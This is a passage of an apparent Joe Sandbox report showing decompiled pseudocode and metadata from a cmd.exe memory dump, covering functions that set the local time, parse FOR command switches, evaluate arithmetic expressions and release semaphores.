						_t122 = _t122 - 1;
						if(_t122 != 0) {
							continue;
						}
						L7:
						_t120 = _t120 - 2;
						L8:
						_t91 =  &_v40;
						 *_t120 = 0;
						E011E18C0( &_v40, 0x10, 0x11ff80c);
						L10:
						while(1) {
							L10:
							if(_t88 == 0 ||  *_t88 == 0) {
								_t42 =  *0x11fd540; // 0x0
								_t43 = _t42;
								if(_t43 == 0) {
									_t44 = 0x2342;
								} else {
									if(_t43 == 2) {
										_t44 = 0x4000271d;
									} else {
										_t44 = 0x4000271e;
									}
								}
								if(_t124 != 0) {
									_push(0);
									_push(0x2343);
									E011DC108(_t91);
									_t129 = _t128 + 8;
								} else {
									E011DC108(_t91, _t44, 1, 0x11ff80c);
									_t129 = _t128 + 0xc;
								}
								__imp___get_osfhandle( &_v624);
								_t128 = _t129 + 4;
								_t113 =  &_v604;
								if(E011F3B11( &_v624,  &_v604, 0, 0x104) == 0) {
									goto L58;
								} else {
									_t50 = _v624;
									if(_t50 == 0) {
										goto L58;
									}
									 *((short*)(_t127 + _t50 * 2 - 0x258)) = 0;
									_t96 =  &_v604;
									_t51 = _v604;
									if(_t51 == 0) {
										L33:
										if(E011E0178(_t51) == 0) {
											_push( &_v604);
											E011E25D9(L"%s\r\n");
											_t128 = _t128 + 8;
										}
										goto L35;
									}
									_t119 = _t51 & 0x0000ffff;
									while(_t119 != 0xa && _t119 != 0xd) {
										_t51 =  *(_t96 + 2) & 0x0000ffff;
										_t96 = _t96 + 2;
										_t119 = _t51;
										if(_t51 != 0) {
											continue;
										}
										goto L33;
									}
									_t51 = 0;
									 *_t96 = 0;
									goto L33;
								}
							} else {
								_t103 = _t88;
								_t11 = _t103 + 2; // 0x2
								_t113 = _t11;
								do {
									_t67 =  *_t103;
									_t103 = _t103 + 2;
								} while (_t67 != 0);
								_t105 = _t103 - _t113 >> 1;
								if(_t103 - _t113 >> 1 >= 0x104) {
									_push(0);
									asm("sbb esi, esi");
									_push(_t124);
									E011DC108(_t105);
									L57:
									L58:
									_t48 = 1;
									L59:
									return E011E6FD0(_t48, _t88, _v8 ^ _t127, _t113, _t122, _t124);
								}
								E011E1040( &_v604, 0x105, _t88);
								L35:
								E011E1040( &_v72, 0x10,  &_v40);
								_t115 = 0x10;
								_t55 =  &_v72;
								while( *_t55 != 0) {
									_t55 = _t55 + 2;
									_t115 = _t115 - 1;
									if(_t115 != 0) {
										continue;
									}
									break;
								}
								asm("sbb ecx, ecx");
								_t101 =  ~_t115 & 0x00000010 - _t115;
								if(_t115 == 0) {
									L48:
									_t113 =  &_v72;
									_t122 = E011DEA40( &_v604,  &_v72, 2);
									if( *_t122 == 0) {
										L61:
										_t48 = 0;
										goto L59;
									}
									GetLocalTime( &_v620);
									_t113 = _t122;
									_t91 =  &_v620;
									_push( &_v40);
									if(_t124 != 0) {
										_t61 = E011F4159( &_v620, _t113);
									} else {
										_t61 = E011F3FD4( &_v620, _t113);
									}
									if(_t61 == 0) {
										L55:
										_push(0);
										asm("sbb eax, eax");
										_push(( ~_t124 & 0x00000003) + 0x232f);
										E011DC108(_t91);
										_t128 = _t128 + 8;
										_t88 = 0;
										continue;
									} else {
										SetLocalTime( &_v620);
										if(SetLocalTime( &_v620) != 0) {
											goto L61;
										}
										if(GetLastError() == 0x522) {
											_push(0);
											_push(GetLastError());
											E011DC5A2(_t91);
											goto L57;
										}
										goto L55;
									}
								}
								_t78 =  &_v72 + _t101 * 2;
								_t118 = 0x10 - _t101;
								if(0x10 == 0) {
									L46:
									_t78 = _t78 - 2;
									L47:
									 *_t78 = 0;
									goto L48;
								}
								_t108 = 0x7ffffffe;
								_t88 = ";" - _t78;
								while(_t108 != 0) {
									_t123 =  *(_t88 + _t78) & 0x0000ffff;
									if(_t123 == 0) {
										break;
									}
									 *_t78 = _t123;
									_t108 = _t108 - 1;
									_t78 =  &(_t78[0]);
									_t118 = _t118 - 1;
									if(_t118 != 0) {
										continue;
									}
									goto L46;
								}
								if(_t118 != 0) {
									goto L47;
								}
								goto L46;
							}
						}
					}
					if(_t122 != 0) {
						goto L8;
					}
					goto L7;
				}
			}









































                                    0x011f3cd2
                                    0x011f3cd9
                                    0x011f3cde
                                    0x011f3ce0
                                    0x011f3ce5
                                    0x011f3d3b
                                    0x011f3d48
                                    0x011f3d4f
                                    0x011f3d53
                                    0x00000000
                                    0x011f3ce7
                                    0x011f3ce7
                                    0x011f3cef
                                    0x011f3cf4
                                    0x011f3cf7
                                    0x011f3d01
                                    0x011f3d08
                                    0x00000000
                                    0x00000000
                                    0x011f3d0a
                                    0x011f3d0d
                                    0x011f3d10
                                    0x011f3d13
                                    0x00000000
                                    0x00000000
                                    0x011f3d1b
                                    0x011f3d1b
                                    0x011f3d1e
                                    0x011f3d20
                                    0x011f3d23
                                    0x011f3d2e
                                    0x00000000
                                    0x011f3d58
                                    0x011f3d58
                                    0x011f3d5a
                                    0x011f3d98
                                    0x011f3d9d
                                    0x011f3da0
                                    0x011f3db5
                                    0x011f3da2
                                    0x011f3da5
                                    0x011f3dae
                                    0x011f3da7
                                    0x011f3da7
                                    0x011f3da7
                                    0x011f3da5
                                    0x011f3dbc
                                    0x011f3dd0
                                    0x011f3dd2
                                    0x011f3dd7
                                    0x011f3ddc
                                    0x011f3dbe
                                    0x011f3dc6
                                    0x011f3dcb
                                    0x011f3dcb
                                    0x011f3ded
                                    0x011f3df3
                                    0x011f3df6
                                    0x011f3e05
                                    0x00000000
                                    0x011f3e0b
                                    0x011f3e0b
                                    0x011f3e13
                                    0x00000000
                                    0x00000000
                                    0x011f3e1b
                                    0x011f3e23
                                    0x011f3e29
                                    0x011f3e33
                                    0x011f3e59
                                    0x011f3e62
                                    0x011f3e6a
                                    0x011f3e70
                                    0x011f3e75
                                    0x011f3e75
                                    0x00000000
                                    0x011f3e62
                                    0x011f3e35
                                    0x011f3e38
                                    0x011f3e44
                                    0x011f3e48
                                    0x011f3e4b
                                    0x011f3e50
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011f3e52
                                    0x011f3e54
                                    0x011f3e56
                                    0x00000000
                                    0x011f3e56
                                    0x011f3d62
                                    0x011f3d62
                                    0x011f3d64
                                    0x011f3d64
                                    0x011f3d67
                                    0x011f3d67
                                    0x011f3d6a
                                    0x011f3d6d
                                    0x011f3d74
                                    0x011f3d7c
                                    0x011f3f94
                                    0x011f3f96
                                    0x011f3fa1
                                    0x011f3fa2
                                    0x011f3fa7
                                    0x011f3faa
                                    0x011f3faa
                                    0x011f3faf
                                    0x011f3fbf
                                    0x011f3fbf
                                    0x011f3d8e
                                    0x011f3e78
                                    0x011f3e84
                                    0x011f3e89
                                    0x011f3e8e
                                    0x011f3e97
                                    0x011f3e9d
                                    0x011f3ea0
                                    0x011f3ea3
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011f3ea3
                                    0x011f3eb0
                                    0x011f3eb2
                                    0x011f3eb6
                                    0x011f3efe
                                    0x011f3f00
                                    0x011f3f0e
                                    0x011f3f14
                                    0x011f3fd0
                                    0x011f3fd0
                                    0x00000000
                                    0x011f3fd0
                                    0x011f3f21
                                    0x011f3f2a
                                    0x011f3f2c
                                    0x011f3f32
                                    0x011f3f35
                                    0x011f3f3e
                                    0x011f3f37
                                    0x011f3f37
                                    0x011f3f37
                                    0x011f3f45
                                    0x011f3f72
                                    0x011f3f76
                                    0x011f3f78
                                    0x011f3f82
                                    0x011f3f83
                                    0x011f3f88
                                    0x011f3f8b
                                    0x00000000
                                    0x011f3f47
                                    0x011f3f4e
                                    0x011f3f63
                                    0x00000000
                                    0x00000000
                                    0x011f3f70
                                    0x011f3fc0
                                    0x011f3fc8
                                    0x011f3fc9
                                    0x00000000
                                    0x011f3fc9
                                    0x00000000
                                    0x011f3f70
                                    0x011f3f45
                                    0x011f3ec0
                                    0x011f3ec3
                                    0x011f3ec5
                                    0x011f3ef6
                                    0x011f3ef6
                                    0x011f3ef9
                                    0x011f3efb
                                    0x00000000
                                    0x011f3efb
                                    0x011f3ecc
                                    0x011f3ed1
                                    0x011f3ed7
                                    0x011f3edb
                                    0x011f3ee2
                                    0x00000000
                                    0x00000000
                                    0x011f3ee4
                                    0x011f3ee7
                                    0x011f3ee8
                                    0x011f3eeb
                                    0x011f3eee
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011f3ef0
                                    0x011f3ef4
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011f3ef4
                                    0x011f3d5a
                                    0x011f3d58
                                    0x011f3d19
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011f3d19

                                    APIs
                                    • _get_osfhandle.MSVCRT ref: 011F3DED
                                    • GetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00000002,002E003A), ref: 011F3F21
                                    • SetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,002E003A,?,002E003A), ref: 011F3F4E
                                    • SetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,002E003A), ref: 011F3F5B
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,002E003A), ref: 011F3F65
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,002E003A), ref: 011F3FC2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: LocalTime$ErrorLast$_get_osfhandle
                                    • String ID: %s$/-.$:
                                    • API String ID: 1033501010-879152773
                                    • Opcode ID: 98d0240bf57d487f5a7b0751c0276c171fe72203a98ac5a9918e94f9acb30018
                                    • Instruction ID: aaf4496f0f5f4ea29e44c89b40f291fba41fd36363e426528a8b77db2cf638fc
                                    • Opcode Fuzzy Hash: 98d0240bf57d487f5a7b0751c0276c171fe72203a98ac5a9918e94f9acb30018
                                    • Instruction Fuzzy Hash: 67812531A2022687EF2C9E78C859BEE33A5BF80304F44416CDA26D72D5EB719A46C752
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011D9A26, Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 212COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 50%
                                    			E011D9A26(void* __eax) {
				void* __edi;
				intOrPtr _t31;
				signed short _t32;
				intOrPtr _t36;
				intOrPtr _t44;
				int _t47;
				intOrPtr _t52;
				void* _t60;
				void* _t70;
				void* _t79;
				void* _t80;
				void* _t86;
				void* _t87;
				void* _t88;
				void* _t89;
				void* _t90;
				void* _t91;
				void* _t94;
				signed int _t96;
				intOrPtr* _t101;

				_t96 = 0;
				__imp___wcsicmp(L"FOR/?", 0x120faa0);
				_t102 = __eax;
				if(__eax == 0) {
					 *0x120faa6 = 0;
					_t96 = 1;
				}
				_t63 = 0x2b;
				 *0x120fa8c = 0x1e;
				_t101 = E011DE9A0(_t63, _t102);
				_t31 = 0x2f;
				if(_t96 != 0) {
					 *0x120faa0 = _t31;
					_t32 = 0x3f;
					 *0x120faa2 = _t32;
					 *0x120faa4 = 0;
				} else {
					_t63 = 0;
					E011DF030(0);
				}
				_t88 = 0x2b;
				if(E011DDCE1(_t60, _t88, _t96) != 0) {
					 *(_t101 + 0x38) =  *(_t101 + 0x38) & 0x00000000;
					 *_t101 = 0x3c;
					goto L18;
				} else {
					 *(_t101 + 0x48) =  *(_t101 + 0x48) & 0x00000000;
					_t36 = 0x25;
					if( *0x1213cc9 == 0) {
						L13:
						if( *0x120faa0 != _t36) {
							L45:
							E011F82EB(_t63);
							L17:
							_push(0x120faa0);
							_push( *(_t101 + 0x38));
							_t89 = 0x1e;
							E011D9C73( *(_t101 + 0x38), _t89);
							E011D9C4D(L"IN");
							_push(0x120faa0);
							_push( *(_t101 + 0x38));
							_t90 = 0x1e;
							E011D9C73( *(_t101 + 0x38), _t90);
							 *((intOrPtr*)(_t101 + 0x3c)) = E011D9936(_t60);
							E011D9C4D(L"DO");
							_push(0x120faa0);
							_t91 = 8;
							E011E1040( *(_t101 + 0x38) + 0x2c, _t91);
							_t70 = 0x2b;
							_t44 = E011DDC74(_t60, _t70);
							 *((intOrPtr*)(_t101 + 0x40)) = _t44;
							if(_t44 == 0) {
								E011F82EB(_t70);
							}
							L18:
							return _t101;
						}
						_t47 = iswspace( *0x120faa2 & 0x0000ffff);
						_pop(_t63);
						if(_t47 != 0) {
							goto L45;
						}
						_t63 = L"=,;";
						 *(_t101 + 0x44) =  *0x120faa2 & 0x0000ffff;
						if(E011DD7D4(L"=,;",  *0x120faa2 & 0x0000ffff) != 0 ||  *0x120fa8c != 3) {
							goto L45;
						} else {
							goto L17;
						}
					} else {
						while(1) {
							__imp___wcsicmp(L"/L", 0x120faa0);
							if(_t36 == 0) {
								goto L30;
							}
							L7:
							__imp___wcsicmp(L"/D", 0x120faa0);
							if(_t36 == 0) {
								 *(_t101 + 0x48) =  *(_t101 + 0x48) | 0x00000002;
								L25:
								_t36 = E011DF030(0);
								while(1) {
									__imp___wcsicmp(L"/L", 0x120faa0);
									if(_t36 == 0) {
										goto L30;
									}
									goto L7;
								}
								goto L30;
							}
							__imp___wcsicmp(L"/F", 0x120faa0);
							if(_t36 == 0) {
								 *(_t101 + 0x48) =  *(_t101 + 0x48) | 0x00000008;
								E011DF030(0);
								_t36 =  *0x120faa0;
								_t79 = 0x25;
								__eflags = _t36 - _t79;
								if(_t36 == _t79) {
									continue;
								}
								_t80 = 0x2f;
								__eflags = _t36 - _t80;
								if(_t36 == _t80) {
									continue;
								}
								__eflags =  *((intOrPtr*)(_t101 + 0x4c));
								if( *((intOrPtr*)(_t101 + 0x4c)) != 0) {
									E011F82EB(_t80);
								}
								_t63 = 6 +  *0x120fa8c * 2;
								_t52 = E011E00B0(_t63);
								__eflags = _t52;
								if(_t52 == 0) {
									L41:
									E011F9287(_t63);
									__imp__longjmp(0x120b8b8, 1);
									L42:
									__eflags = _t63 - 6;
									if(_t63 != 6) {
										__eflags = _t63 - 4;
										if(_t63 != 4) {
											E011F82EB(_t63);
										}
									}
									L12:
									_t36 = 0x25;
									goto L13;
								} else {
									_t94 =  *0x120fa8c + 3;
									L24:
									 *((intOrPtr*)(_t101 + 0x4c)) = _t52;
									E011E1040(_t52, _t94, 0x120faa0);
									goto L25;
								}
							}
							__imp___wcsicmp(L"/R", 0x120faa0);
							_t63 =  *(_t101 + 0x48);
							if(_t36 == 0) {
								 *(_t101 + 0x48) = _t63 | 0x00000004;
								E011DF030(0);
								__eflags =  *((intOrPtr*)(_t101 + 0x4c));
								if( *((intOrPtr*)(_t101 + 0x4c)) != 0) {
									E011F82EB(0);
								}
								_t36 =  *0x120faa0;
								_t86 = 0x25;
								__eflags = _t36 - _t86;
								if(_t36 == _t86) {
									continue;
								} else {
									_t87 = 0x2f;
									__eflags = _t36 - _t87;
									if(_t36 == _t87) {
										continue;
									}
									_t63 = 2 +  *0x120fa8c * 2;
									_t52 = E011E00B0(_t63);
									__eflags = _t52;
									if(_t52 == 0) {
										goto L41;
									}
									_t94 =  *0x120fa8c + 1;
									goto L24;
								}
							}
							if(_t63 == 0 || _t63 == 8) {
								goto L12;
							} else {
								__eflags = _t63 - 2;
								if(_t63 == 2) {
									goto L12;
								}
								__eflags = _t63 - 1;
								if(_t63 == 1) {
									goto L12;
								}
								goto L42;
							}
							L30:
							 *(_t101 + 0x48) =  *(_t101 + 0x48) | 1;
							goto L25;
						}
					}
				}
			}























                                    0x011d9a34
                                    0x011d9a36
                                    0x011d9a3e
                                    0x011d9a40
                                    0x011f1097
                                    0x011f109d
                                    0x011f109d
                                    0x011d9a48
                                    0x011d9a49
                                    0x011d9a58
                                    0x011d9a5c
                                    0x011d9a5f
                                    0x011f10a3
                                    0x011f10ab
                                    0x011f10ac
                                    0x011f10b4
                                    0x011d9a65
                                    0x011d9a65
                                    0x011d9a67
                                    0x011d9a67
                                    0x011d9a6e
                                    0x011d9a76
                                    0x011f10bf
                                    0x011f10c3
                                    0x00000000
                                    0x011d9a7c
                                    0x011d9a7c
                                    0x011d9a89
                                    0x011d9a8a
                                    0x011d9b0a
                                    0x011d9b11
                                    0x011f1154
                                    0x011f1154
                                    0x011d9b57
                                    0x011d9b5f
                                    0x011d9b60
                                    0x011d9b63
                                    0x011d9b64
                                    0x011d9b6e
                                    0x011d9b76
                                    0x011d9b77
                                    0x011d9b7a
                                    0x011d9b7b
                                    0x011d9b8a
                                    0x011d9b8d
                                    0x011d9b95
                                    0x011d9b9b
                                    0x011d9b9c
                                    0x011d9ba3
                                    0x011d9ba4
                                    0x011d9ba9
                                    0x011d9bae
                                    0x011f115e
                                    0x011f115e
                                    0x011d9bb5
                                    0x011d9bb8
                                    0x011d9bb8
                                    0x011d9b1f
                                    0x011d9b25
                                    0x011d9b28
                                    0x00000000
                                    0x00000000
                                    0x011d9b35
                                    0x011d9b3a
                                    0x011d9b44
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011d9a8c
                                    0x011d9a8f
                                    0x011d9a99
                                    0x011d9aa3
                                    0x00000000
                                    0x00000000
                                    0x011d9aa9
                                    0x011d9ab3
                                    0x011d9abd
                                    0x011d9c3b
                                    0x011d9c19
                                    0x011d9c1b
                                    0x011d9a8f
                                    0x011d9a99
                                    0x011d9aa3
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011d9aa3
                                    0x00000000
                                    0x011d9a8f
                                    0x011d9acd
                                    0x011d9ad7
                                    0x011d9bb9
                                    0x011d9bbf
                                    0x011d9bc4
                                    0x011d9bcc
                                    0x011d9bcd
                                    0x011d9bd0
                                    0x00000000
                                    0x00000000
                                    0x011d9bd8
                                    0x011d9bd9
                                    0x011d9bdc
                                    0x00000000
                                    0x00000000
                                    0x011d9be2
                                    0x011d9be6
                                    0x011d9c46
                                    0x011d9c46
                                    0x011d9bed
                                    0x011d9bf4
                                    0x011d9bf9
                                    0x011d9bfb
                                    0x011f1127
                                    0x011f1127
                                    0x011f1132
                                    0x011f1138
                                    0x011f1138
                                    0x011f113b
                                    0x011f1141
                                    0x011f1144
                                    0x011f114a
                                    0x011f114a
                                    0x011f1144
                                    0x011d9b07
                                    0x011d9b09
                                    0x00000000
                                    0x011d9c01
                                    0x011d9c07
                                    0x011d9c0a
                                    0x011d9c11
                                    0x011d9c14
                                    0x00000000
                                    0x011d9c14
                                    0x011d9bfb
                                    0x011d9ae7
                                    0x011d9aef
                                    0x011d9af4
                                    0x011f10d1
                                    0x011f10d6
                                    0x011f10db
                                    0x011f10df
                                    0x011f10e1
                                    0x011f10e1
                                    0x011f10e6
                                    0x011f10ee
                                    0x011f10ef
                                    0x011f10f2
                                    0x00000000
                                    0x011f10f8
                                    0x011f10fa
                                    0x011f10fb
                                    0x011f10fe
                                    0x00000000
                                    0x00000000
                                    0x011f1109
                                    0x011f1110
                                    0x011f1115
                                    0x011f1117
                                    0x00000000
                                    0x00000000
                                    0x011f111f
                                    0x00000000
                                    0x011f111f
                                    0x011f10f2
                                    0x011d9afc
                                    0x00000000
                                    0x011d9c25
                                    0x011d9c25
                                    0x011d9c28
                                    0x00000000
                                    0x00000000
                                    0x011d9c2e
                                    0x011d9c30
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011d9c36
                                    0x011d9c41
                                    0x011d9c41
                                    0x00000000
                                    0x011d9c41
                                    0x011d9a8f
                                    0x011d9a8a

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: _wcsicmp$iswspace
                                    • String ID: =,;$FOR/?
                                    • API String ID: 759518647-2121398454
                                    • Opcode ID: b77ce97a736d4013ad29b70013c95d69b8778377815fbea10cd2448db8cd1092
                                    • Instruction ID: 62e96f59beb866161447ff4f1d43b5cbffa754f38dadb6dd76477d9074248b0a
                                    • Opcode Fuzzy Hash: b77ce97a736d4013ad29b70013c95d69b8778377815fbea10cd2448db8cd1092
                                    • Instruction Fuzzy Hash: EF6113313407429BEB3DAB7AF95DB7A37A0EB9061CF54411EE2038A9C1EF71A482C715
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011D64DC, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 153COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 28%
                                    			E011D64DC(void* __eflags, intOrPtr _a4, wchar_t* _a8, long _a12, intOrPtr _a16) {
				char _v8;
				char _v12;
				char _v28;
				signed short* _t39;
				short* _t45;
				int _t50;
				wchar_t* _t54;
				long _t55;
				long _t62;
				signed int _t71;

				E011D9794( &_a8);
				_t39 = _a8;
				_t62 =  *_t39 & 0x0000ffff;
				if(_t62 == 0) {
					L22:
					_a16 = 0x400023cd;
					L9:
					L10:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					return _a4;
				}
				if(_t62 == 0x28) {
					_a8 =  &(_t39[1]);
					_push( &_v28);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					E011D6355();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					__eflags = _a16;
					if(_a16 != 0) {
						L21:
						goto L10;
					}
					E011D9794( &_a8);
					_t45 = _a8;
					__eflags =  *_t45 - 0x29;
					if( *_t45 != 0x29) {
						_a16 = 0x400023cc;
					} else {
						_a8 = _t45 + 2;
					}
					goto L9;
				}
				if(wcschr(L"+-~!", _t62) != 0) {
					_a8 =  &(_a8[0]);
					_push( &_v28);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					E011D64DC(__eflags);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					__eflags = _a16;
					if(_a16 != 0) {
						goto L21;
					}
					E011D4409( &_a8, _t62, _a12);
					goto L9;
				}
				_t50 = iswdigit(_t62);
				if(_t50 == 0) {
					__eflags = E011D6785( &_a8,  &_v12, __eflags,  &_v8);
					if(__eflags == 0) {
						goto L22;
					} else {
						_a12 = E011D60DE(_v8, __eflags);
						goto L9;
					}
				}
				__imp___errno();
				 *_t50 = 0;
				_t54 = _a8;
				if( *_t54 == 0x30) {
					_t71 = _t54[0] & 0x0000ffff;
					__eflags = _t71 - 0x78;
					if(_t71 == 0x78) {
						L24:
						_t55 = wcstoul(_t54,  &_a8, 0);
						L6:
						_a12 = _t55;
						if(_t55 == 0x7fffffff) {
							__imp___errno();
							__eflags =  *_t55 - 0x22;
							if( *_t55 != 0x22) {
								goto L7;
							}
							_a16 = 0x400023d0;
							goto L9;
						}
						L7:
						if(iswdigit( *_a8 & 0x0000ffff) != 0 || iswalpha( *_a8 & 0x0000ffff) != 0) {
							_a16 = 0x400023cf;
						}
						goto L9;
					}
					__eflags = _t71 - 0x58;
					if(_t71 != 0x58) {
						goto L5;
					}
					goto L24;
				}
				L5:
				_t55 = wcstol(_t54,  &_a8, 0);
				goto L6;
			}













                                    0x011d64ea
                                    0x011d64ef
                                    0x011d64f2
                                    0x011d64f8
                                    0x011eac90
                                    0x011eac90
                                    0x011d6589
                                    0x011d658c
                                    0x011d6591
                                    0x011d6592
                                    0x011d6593
                                    0x011d659a
                                    0x011d659a
                                    0x011d6501
                                    0x011d65cf
                                    0x011d65d5
                                    0x011d65d6
                                    0x011d65d7
                                    0x011d65d8
                                    0x011d65d9
                                    0x011d65e3
                                    0x011d65e4
                                    0x011d65e5
                                    0x011d65e6
                                    0x011d65ea
                                    0x011d665c
                                    0x00000000
                                    0x011d665c
                                    0x011d65ef
                                    0x011d65f4
                                    0x011d65f7
                                    0x011d65fb
                                    0x011eac9c
                                    0x011d6601
                                    0x011d6604
                                    0x011d6604
                                    0x00000000
                                    0x011d65fb
                                    0x011d6517
                                    0x011d6624
                                    0x011d6633
                                    0x011d6634
                                    0x011d6635
                                    0x011d6636
                                    0x011d6637
                                    0x011d6641
                                    0x011d6642
                                    0x011d6643
                                    0x011d6644
                                    0x011d6648
                                    0x00000000
                                    0x00000000
                                    0x011d6652
                                    0x00000000
                                    0x011d6652
                                    0x011d651e
                                    0x011d6527
                                    0x011d65ac
                                    0x011d65ae
                                    0x00000000
                                    0x011d65b4
                                    0x011d65bf
                                    0x00000000
                                    0x011d65bf
                                    0x011d65ae
                                    0x011d6529
                                    0x011d6531
                                    0x011d6533
                                    0x011d653a
                                    0x011d6609
                                    0x011d660d
                                    0x011d6610
                                    0x011eaca8
                                    0x011eacae
                                    0x011d654c
                                    0x011d654f
                                    0x011d6557
                                    0x011eacb9
                                    0x011eacbf
                                    0x011eacc2
                                    0x00000000
                                    0x00000000
                                    0x011eacc8
                                    0x00000000
                                    0x011eacc8
                                    0x011d655d
                                    0x011d656d
                                    0x011eacd4
                                    0x011eacd4
                                    0x00000000
                                    0x011d656d
                                    0x011d6616
                                    0x011d6619
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011d661f
                                    0x011d6540
                                    0x011d6546
                                    0x00000000

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: _errnoiswdigit$iswalphawcschrwcstolwcstoul
                                    • String ID: +-~!
                                    • API String ID: 2191331888-2604099254
                                    • Opcode ID: 7de3c2ad85934e3951e43913ffc15c5663041ac727e63ba5b3ca1c4b7ddd9602
                                    • Instruction ID: 60309befc6834d5d1945c4748cbbe6b9b343a600474319de1283a0dbaf62c571
                                    • Opcode Fuzzy Hash: 7de3c2ad85934e3951e43913ffc15c5663041ac727e63ba5b3ca1c4b7ddd9602
                                    • Instruction Fuzzy Hash: CC51B071800609EFCF1DDF68E8489AB3BA4EF15364F51811AFC169B184EB74DA94CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F213A, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 102synchronizationCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 93%
                                    			E011F213A(void* __ecx, intOrPtr* __edx) {
				void* _v0;
				long _v8;
				long _v12;
				long _t11;
				void* _t16;
				long _t18;
				intOrPtr* _t41;
				void* _t44;

				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_t41 = __edx;
				_t11 = WaitForSingleObject(__ecx, 0);
				if(_t11 != 0xffffffff) {
					if(_t11 == 0 || _t11 == 0x102) {
						_v8 = 0;
						if(_t11 != 0) {
							_v12 = 0;
							if(ReleaseSemaphore(_t44, 1,  &_v12) != 0) {
								if(_v12 == 0) {
									if(ReleaseSemaphore(_t44, 1, 0) != 0 || GetLastError() != 0x12a) {
										goto L24;
									} else {
										_t18 = WaitForSingleObject(_t44, 0);
										if(_t18 != 0xffffffff) {
											if(_t18 == 0) {
												goto L22;
											} else {
												goto L24;
											}
										} else {
											goto L2;
										}
									}
								} else {
									goto L24;
								}
							} else {
								goto L2;
							}
						} else {
							if(ReleaseSemaphore(_t44, 1,  &_v8) != 0) {
								_v8 = _v8 + 1;
								if(ReleaseSemaphore(_t44, 1, 0) != 0 || GetLastError() != 0x12a) {
									goto L24;
								} else {
									L22:
									 *_t41 = _v8;
									_t16 = 0;
								}
							} else {
								goto L2;
							}
						}
					} else {
						L24:
						E011F292C("wil", 0x8000ffff);
						_t16 = 0x8000ffff;
					}
				} else {
					L2:
					_t16 = E011F2913("wil");
				}
				return _t16;
			}











                                    0x011f213f
                                    0x011f2140
                                    0x011f2146
                                    0x011f214a
                                    0x011f214c
                                    0x011f2155
                                    0x011f2170
                                    0x011f2183
                                    0x011f2188
                                    0x011f21ca
                                    0x011f21d9
                                    0x011f21e8
                                    0x011f21fd
                                    0x00000000
                                    0x011f220c
                                    0x011f220e
                                    0x011f2217
                                    0x011f2225
                                    0x00000000
                                    0x011f2227
                                    0x00000000
                                    0x011f2227
                                    0x011f2219
                                    0x00000000
                                    0x011f2219
                                    0x011f2217
                                    0x011f21ea
                                    0x00000000
                                    0x011f21ea
                                    0x011f21db
                                    0x00000000
                                    0x011f21db
                                    0x011f218a
                                    0x011f2199
                                    0x011f21a2
                                    0x011f21b1
                                    0x00000000
                                    0x011f222e
                                    0x011f222e
                                    0x011f2231
                                    0x011f2233
                                    0x011f2233
                                    0x011f219b
                                    0x00000000
                                    0x011f219b
                                    0x011f2199
                                    0x011f2179
                                    0x011f223c
                                    0x011f224a
                                    0x011f224f
                                    0x011f224f
                                    0x011f2157
                                    0x011f215c
                                    0x011f2164
                                    0x011f2164
                                    0x011f2257

                                    APIs
                                    • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,?,00000000,?,00000000,00000000,?,011F2CF5), ref: 011F214C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
